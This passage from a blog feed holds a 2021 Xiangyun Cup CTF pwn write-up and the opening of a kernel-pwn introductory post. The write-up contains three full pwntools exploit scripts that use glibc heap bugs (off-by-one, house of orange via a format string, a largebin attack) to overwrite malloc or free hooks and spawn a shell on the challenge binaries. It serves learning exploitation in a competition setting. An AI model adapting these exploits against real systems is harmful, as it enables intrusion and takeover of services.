<updated>2021-09-22T09:17:47.092Z</updated>
<category term="pwn" scheme="https://brooke-hub.github.io/tags/pwn/"/>
</entry>
<entry>
<title>2021 Xiangyun Cup pwn_wp</title>
<link href="https://brooke-hub.github.io/2021/09/20/2021%E7%A5%A5%E4%BA%91%E6%9D%AFpwn-wp/"/>
<id>https://brooke-hub.github.io/2021/09/20/2021%E7%A5%A5%E4%BA%91%E6%9D%AFpwn-wp/</id>
<published>2021-09-20T00:58:21.000Z</published>
<updated>2021-09-20T13:23:00.992Z</updated>
<content type="html"><![CDATA[<blockquote><p>Yet another write-up I put off for far too long: the Xiang-pwn Cup 😅</p></blockquote><span id="more"></span><h1 id="PassWordBox-FreeVersion"><a href="#PassWordBox-FreeVersion" class="headerlink" title="PassWordBox_FreeVersion"></a><strong>PassWordBox_FreeVersion</strong></h1><p>off by one</p><p>The data is XOR-encrypted, but the XOR output can be leaked, and from it the key can be recovered.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span 
class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line">binary = <span class="string">'./pwdFree'</span></span><br><span class="line">elf=ELF(binary)</span><br><span class="line">libc=ELF(<span class="string">"/home/wendy/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc.so.6"</span>)</span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'119.3.81.43'</span>, <span 
class="number">49153</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(binary)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span>(<span class="params">choice</span>):</span></span><br><span class="line"> sla(<span class="string">"Choice:"</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">idx,size,pwd</span>):</span></span><br><span class="line"> menu(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'t Save:'</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"> sla(<span class="string">'Length Of Your Pwd:'</span>,<span class="built_in">str</span>(size)) <span class="comment">#<=0x100</span></span><br><span class="line"> sla(<span class="string">'Your Pwd:'</span>,pwd)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,pwd</span>):</span></span><br><span 
class="line"> menu(<span class="number">2</span>)</span><br><span class="line"> sl(<span class="built_in">str</span>(index))</span><br><span class="line"> sd(pwd)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line"> menu(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">"Want Check:"</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">idx</span>):</span></span><br><span class="line"> menu(<span class="number">4</span>)</span><br><span class="line"> sla(<span class="string">"2 Delete:"</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">1</span>,<span class="string">'a'</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'Save ID:'</span>)</span><br><span class="line">xor = (u64(sh.recv(<span class="number">8</span>)))^<span class="built_in">ord</span>(<span class="string">'a'</span>)</span><br><span class="line">leak(<span class="string">'xor'</span>,xor)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">1</span>,<span class="number">0xF0</span>,<span class="string">'a'</span>*<span class="number">0xF0</span>) <span class="comment">#1</span></span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x80</span>,<span class="string">'b'</span>*<span class="number">0x80</span>) <span class="comment">#2</span></span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x88</span>,<span class="string">'c'</span>*<span class="number">0x88</span>) <span class="comment">#3</span></span><br><span class="line">add(<span 
class="number">4</span>,<span class="number">0xF0</span>,<span class="string">'d'</span>*<span class="number">0xF0</span>) <span class="comment">#4</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>,<span class="number">12</span>): <span class="comment">#5-11</span></span><br><span class="line"> add(i,<span class="number">0xf0</span>,<span class="string">'e'</span>*<span class="number">0xd0</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>,<span class="number">12</span>): <span class="comment">#5-11</span></span><br><span class="line"> delete(i)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">delete(<span class="number">3</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x88</span>,<span class="string">'a'</span>*<span class="number">0x80</span>+p64((<span class="number">0x100</span>+<span class="number">0x90</span>+<span class="number">0x90</span>)^xor)+<span class="string">'\x00'</span>)</span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>,<span class="number">12</span>): <span class="comment">#5-11</span></span><br><span class="line"> add(i,<span class="number">0xf0</span>,<span class="string">'e'</span>*<span class="number">0xd0</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0xF0</span>,<span class="string">'a\n'</span>)</span><br><span class="line">show(<span class="number">2</span>)</span><br><span 
class="line">sh.recvuntil(<span class="string">'Pwd is: '</span>)</span><br><span class="line">libc_base = ((u64(sh.recv(<span class="number">8</span>)))^xor) - <span class="number">0x3ebca0</span></span><br><span class="line">leak(<span class="string">'libc_base'</span>,libc_base)</span><br><span class="line">__free_hook=libc_base+libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">system=libc_base+libc.sym[<span class="string">'system'</span>]</span><br><span class="line"></span><br><span class="line">add(<span class="number">12</span>,<span class="number">0x80</span>,<span class="string">'b\n'</span>) <span class="comment">#12==1</span></span><br><span class="line">add(<span class="number">13</span>,<span class="number">0x88</span>,<span class="string">'c'</span>*<span class="number">0x88</span>) </span><br><span class="line">add(<span class="number">14</span>,<span class="number">0xF0</span>,<span class="string">'d'</span>*<span class="number">0xF0</span>) </span><br><span class="line"></span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">edit(<span class="number">12</span>,p64(__free_hook))</span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x80</span>,<span class="string">'s'</span>)</span><br><span class="line">add(<span class="number">15</span>,<span class="number">0x80</span>,p64((<span class="number">0x4f432</span>+libc_base)^xor)+<span class="string">'\x00'</span>) <span class="comment">#0x4f3d5 0x4f432 0x10a41c</span></span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h1 id="note"><a href="#note" class="headerlink" title="note"></a>note</h1><p>The format string vulnerability in scanf gives an unlimited number of arbitrary-address writes.</p><p>There is no delete function, so house of orange is used.</p><p>With the heap address known, use the arbitrary write to shrink the top chunk size (note that it must stay aligned).</p><p>Let the top chunk be freed into the unsorted bin, then allocate it back out to leak libc.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span 
class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">binary = <span class="string">'./note'</span></span><br><span class="line">elf=ELF(binary)</span><br><span class="line">libc = ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6'</span>)</span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'47.104.70.90'</span>, <span class="number">25315</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(binary)</span><br><span class="line"></span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : 
sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leaklibc</span>():</span></span><br><span class="line"> <span class="keyword">global</span> libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_,_IO_list_all,realloc</span><br><span class="line"> libc_base = u64(sh.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">'\x00'</span>)) - <span class="number">0x3c4c48</span></span><br><span class="line"> success(<span class="string">'libc_base = '</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line"> __malloc_hook=libc_base+libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line"> __free_hook=libc_base+libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line"> system=libc_base+libc.sym[<span class="string">'system'</span>]</span><br><span class="line"> realloc=libc_base+libc.sym[<span class="string">'realloc'</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> sla(<span class="string">'choice: '</span>, <span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line"> cmd(<span 
class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'size: '</span>,<span class="built_in">str</span>(size)) <span class="comment">#<=0x100</span></span><br><span class="line"> sa(<span class="string">'content: '</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">say</span>(<span class="params">fmt,content</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">'say ? '</span>,fmt)</span><br><span class="line"> sla(<span class="string">'? '</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0xf0</span>,<span class="string">'a\n'</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'addr: 0x'</span>)</span><br><span class="line">chunk_addr = <span class="built_in">int</span>(sh.recvuntil(<span class="string">'\n'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>) -<span class="number">0x10</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>-<span class="number">2</span>): <span class="comment"># align top chunk size</span></span><br><span class="line"> add(<span class="number">0xf0</span>,<span class="string">'a\n'</span>)</span><br><span class="line">leak(<span class="string">'chunk_addr'</span>,chunk_addr)</span><br><span class="line">top_chunk=chunk_addr+<span class="number">0xf00</span></span><br><span class="line">leak(<span class="string">'top_chunk'</span>,top_chunk)</span><br><span class="line">say(<span class="string">"%7$s"</span>.ljust(<span 
class="number">8</span>,<span class="string">'\x00'</span>)+p64(top_chunk+<span class="number">8</span>),p64(<span class="number">0x101</span>)) <span class="comment"># top size 0x20101 -> 0x101</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'bbbb\n'</span>)</span><br><span class="line">add(<span class="number">0x10</span>,<span class="string">'a'</span>*<span class="number">8</span>)</span><br><span class="line">show()</span><br><span class="line">leaklibc()</span><br><span class="line"></span><br><span class="line">one=[<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line">say(<span class="string">"%7$s"</span>.ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)+p64(__malloc_hook-<span class="number">8</span>),p64(one[<span class="number">1</span>]+libc_base)+p64(realloc+<span class="number">13</span>)) </span><br><span class="line"></span><br><span class="line">leak(<span class="string">'realloc+13'</span>,realloc+<span class="number">13</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">cmd(<span class="number">1</span>)</span><br><span class="line">sla(<span class="string">'size: '</span>,<span class="built_in">str</span>(<span class="number">0x20</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line"></span><br><span class="line">ti()</span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="PassWordBox-ProVersion"><a href="#PassWordBox-ProVersion" class="headerlink" title="PassWordBox_ProVersion"></a><strong>PassWordBox_ProVersion</strong></h1><p>The encryption is the same as in the first challenge: the XOR key is a fixed number, and since 0^num=num, num can be leaked.</p><p>There is a UAF, but because of the chunk size restriction tcache cannot be hijacked directly.</p><p>A largebin attack can write a very large number (a heap address) into mp_.tcache_bins, after which large chunks can be placed into the tcache bin.</p><p><img src="/2021/09/20/2021%E7%A5%A5%E4%BA%91%E6%9D%AFpwn-wp/image-20210920183216925.png" alt="image-20210920183216925"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span 
class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">binary = <span class="string">'./pwdPro'</span></span><br><span class="line">elf=ELF(binary)</span><br><span class="line">libc = ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/libc.so.6'</span>)</span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span 
class="string">'47.104.70.90'</span>, <span class="number">25315</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(binary)</span><br><span class="line"></span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> sla(<span class="string">'Input Your Choice:\n'</span>, <span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,ID,Length,content</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'Which PwdBox You Want Add:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> sla(<span class="string">'Input The ID You Want Save:'</span>,ID)</span><br><span class="line"> sla(<span class="string">'Length Of Your Pwd:'</span>,<span class="built_in">str</span>(Length)) <span class="comment">#0x41f-0x888</span></span><br><span class="line"> sa(<span 
class="string">'Your Pwd:'</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">'You Want Edit:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> sl(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">'Which PwdBox You Want Check:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> sla(<span class="string">'Idx you want 2 Delete:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">recover</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">5</span>)</span><br><span class="line"> sla(<span class="string">'Idx you want 2 Recover:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="string">'a'</span>,<span class="number">0x628</span>,p64(<span class="number">0</span>)+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">sh.recvuntil(<span class="string">'Save ID:'</span>)</span><br><span class="line">secret_xor = u64(sh.recv(<span class="number">8</span>))</span><br><span class="line">leak(<span 
class="string">'secret_xor'</span>,secret_xor)</span><br><span class="line"></span><br><span class="line">add(<span class="number">1</span>,<span class="string">'b'</span>,<span class="number">0x420</span>,<span class="string">'b\n'</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="string">'b'</span>,<span class="number">0x618</span>,<span class="string">'b\n'</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="string">'b'</span>,<span class="number">0x420</span>,<span class="string">'b\n'</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">7</span>,<span class="string">'b'</span>,<span class="number">0x500</span>,<span class="string">'b\n'</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="string">'b'</span>,<span class="number">0x500</span>,<span class="string">'b\n'</span>)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">0</span>) <span class="comment"># into unsortedbin</span></span><br><span class="line">recover(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'Pwd is: '</span>)</span><br><span class="line">libc_base = (u64(sh.recv(<span class="number">8</span>)) ^ secret_xor) - <span class="number">0x1ebbe0</span></span><br><span class="line">leak(<span class="string">'libc_base'</span>,libc_base)</span><br><span class="line">__free_hook=libc_base+libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">system=libc_base+libc.sym[<span class="string">'system'</span>]</span><br><span class="line"></span><br><span class="line">add(<span class="number">4</span>,<span class="string">'a'</span>,<span class="number">0x638</span>,p64(<span class="number">0</span>)+<span class="string">'\n'</span>) <span class="comment">#0x630 chunk0 into 
largebin</span></span><br><span class="line">dele(<span class="number">2</span>) <span class="comment">#0x620 chunk2 into unsortedbin</span></span><br><span class="line">mp_bins = libc_base+<span class="number">0x1eb280</span>+<span class="number">0x50</span>-<span class="number">0x20</span></span><br><span class="line">leak(<span class="string">'mp_bins'</span>,mp_bins)</span><br><span class="line">edit(<span class="number">0</span>,p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(mp_bins)) <span class="comment"># uaf edit largechunk0(0x630)</span></span><br><span class="line">add(<span class="number">5</span>,<span class="string">'a'</span>,<span class="number">0x638</span>,p64(<span class="number">0</span>)+<span class="string">'\n'</span>) <span class="comment"># chunk2 into largebin --> largebin attack!</span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">7</span>)</span><br><span class="line">dele(<span class="number">8</span>)</span><br><span class="line">recover(<span class="number">8</span>)</span><br><span class="line">edit(<span class="number">8</span>,p64(__free_hook)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">9</span>,<span class="string">'b'</span>,<span class="number">0x500</span>,<span class="string">'c\n'</span>)</span><br><span class="line">edit(<span class="number">9</span>,<span class="string">'/bin/sh\x00\n'</span>)</span><br><span class="line">add(<span class="number">10</span>,<span class="string">'b'</span>,<span class="number">0x500</span>,p64(system^secret_xor)+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">9</span>)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line"></span><br><span class="line">ti()</span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 
id="lemon"><a href="#lemon" class="headerlink" title="lemon"></a>lemon</h1><p>This part is said to test the insecure rand() random-number interface.</p><p>rand() without a seed produces a fixed sequence of numbers, but I still don't quite see where this solution actually relies on the fixed sequence 😗</p><p>As long as a very large number is entered into buf, rand() is called in a loop many times, and if any iteration satisfies the condition the function returns 1.</p><p><img src="/2021/09/20/2021%E7%A5%A5%E4%BA%91%E6%9D%AFpwn-wp/image-20210920134010284.png" alt="image-20210920134010284"></p>]]></content>
<summary type="html"><blockquote>
<p>Another replay I put off for far too long, the 祥pwn杯 (Xiangyun Cup pwn challenges) 😅</p>
</blockquote></summary>
<category term="pwn" scheme="https://brooke-hub.github.io/tags/pwn/"/>
</entry>
<entry>
<title>kernel_pwn: A First Look</title>
<link href="https://brooke-hub.github.io/2021/09/09/kernel-pwn%E5%88%9D%E6%8E%A2/"/>
<id>https://brooke-hub.github.io/2021/09/09/kernel-pwn%E5%88%9D%E6%8E%A2/</id>
<published>2021-09-09T10:49:49.000Z</published>
<updated>2021-09-13T09:13:34.901Z</updated>
<content type="html"><![CDATA[<blockquote><p>I really couldn't follow the introductory explanation on the Wiki before; now I'm trying to get into kernel pwn by following 轩哥's blog.</p></blockquote><span id="more"></span><h2 id="正向开发"><a href="#正向开发" class="headerlink" title="正向开发"></a>Forward Development</h2><p>Start from <a href="https://blog.csdn.net/qb_2008/article/details/6835677">hello world</a></p><p>When compiling to produce module.ko here, you run into an error</p><p><img src="/2021/09/09/kernel-pwn%E5%88%9D%E6%8E%A2/image-20210909185354811.png" alt="image-20210909185354811"></p><p>This is because the function prototype conflicts with the call to the function, for example because the parameter types differ</p><p>So adding the parameter type void fixes it</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/init.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/module.h></span></span></span><br><span class="line"> </span><br><span class="line">MODULE_LICENSE(<span class="string">"Dual BSD/GPL"</span>);</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">hello_init</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> printk(KERN_INFO <span class="string">"Hello, world!\n"</span>);</span><br><span 
